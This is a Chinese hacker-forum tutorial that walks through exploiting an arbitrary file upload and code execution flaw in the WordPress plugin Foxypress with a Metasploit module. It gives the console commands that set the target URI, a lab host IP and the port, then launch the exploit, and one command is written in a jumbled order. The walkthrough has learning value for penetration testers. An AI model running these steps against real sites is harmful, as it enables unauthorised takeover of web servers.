WordPress渗透测试实战教程:利用插件Foxypress的任意代码执行漏洞

zevseo
12100zevseo大版主
2018-09-11 03:13:46
12100 2018-09-11 03:13:46
该模块利用WordPress博客软件插件(称为Foxypress)中的任意PHP代码执行缺陷。该漏洞允许通过uploadify.php脚本进行任意文件上载和远程代码执行。Foxypress插件版本0.4.1.1到0.4.2.1很容易受到攻击。
利用目标
Foxypress插件版本0.4.1.1到0.4.2.1
需求
攻击者:kali Linux
受害者PC:Foxypress插件
打开Kali终端类型  msfconsole

描述:渗透测试实战教程:利用WordPress插件Foxypress的任意代码执行漏洞

图片:1.png

渗透测试实战教程:利用WordPress插件Foxypress的任意代码执行漏洞

现在输入  exploit use / unix / webapp / wp_foxypress_upload
msf exploit (wp_foxypress_upload)>set targeturi /wordpress
msf exploit (wp_foxypress_upload)>set rhost 192.168.0.105 (IP of Remote Host)
msf exploit (wp_foxypress_upload)>set rport 80
msf exploit (wp_foxypress_upload)>exploit

描述:渗透测试实战教程:利用WordPress插件Foxypress的任意代码执行漏洞

图片:foxy.png

渗透测试实战教程:利用WordPress插件Foxypress的任意代码执行漏洞

本文标题:WordPress渗透测试实战教程:利用插件Foxypress的任意代码执行漏洞
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2321.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan